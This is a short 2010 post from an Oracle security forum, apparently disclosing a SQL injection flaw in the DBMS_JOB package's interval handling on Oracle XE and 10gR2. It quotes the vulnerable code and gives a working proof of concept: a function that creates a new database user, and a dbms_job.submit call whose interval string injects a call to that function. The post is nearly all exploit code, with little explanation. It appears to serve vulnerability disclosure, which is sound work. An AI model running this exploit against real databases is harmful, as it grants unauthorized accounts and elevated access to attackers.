Pete Finnigan's Oracle Security Forum
        (http://www.petefinnigan.com/forum/yabb/YaBB.cgi)
      

        Database Security >> Database Security >> DBMS_JOB PACKAGE, find_date FUNCTION sql-injection
        
(Message started by: Pete Finnigan on Apr 9th, 2010, 8:03am)
Title: DBMS_JOB PACKAGE, find_date FUNCTION sql-injection
Post by Pete Finnigan on Apr 9th, 2010, 8:03am

Code:
...
  30    CUR := DBMS_SQL.OPEN_CURSOR;
  31       BEGIN
  32
  33         DBMS_SYS_SQL.PARSE_AS_USER( CUR, 'select sysdate, ' || INTERVAL ||
  34



   ' from dual', DBMS_SQL.NATIVE );
...

Find_date is not declared. I use SUBMIT procedure to exploit injection.


Code:
...
 134     MYDATE := FIND_DATE(INTERVAL);
 135     IF NOT NO_PARSE THEN
 136       PARSE_JOB(WHAT);
 137     END IF;
 138
...

1. Create function.

Code:
CREATE OR REPLACE FUNCTION fff return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'create user fff identified by fff';
COMMIT;
RETURN 'sys';
END;
/


2. Exploit POC

Code:
DECLARE
jobNo BINARY_INTEGER;
BEGIN
jobNo:=4242;
dbms_job.submit(jobNo, 'do_job;', TRUNC(SYSDATE+(1/24), 'HH'),'TRUNC(SYSDATE+(30/24/60),''MI'') from dual where chr(115)=sys.fff() --');
END;


DB Version: Oracle XE, Oracle 10gR2
Procedure isubmit can be used.


Powered by YaBB 1 Gold - SP 1.4!
Forum software copyright © 2000-2004 Yet another Bulletin Board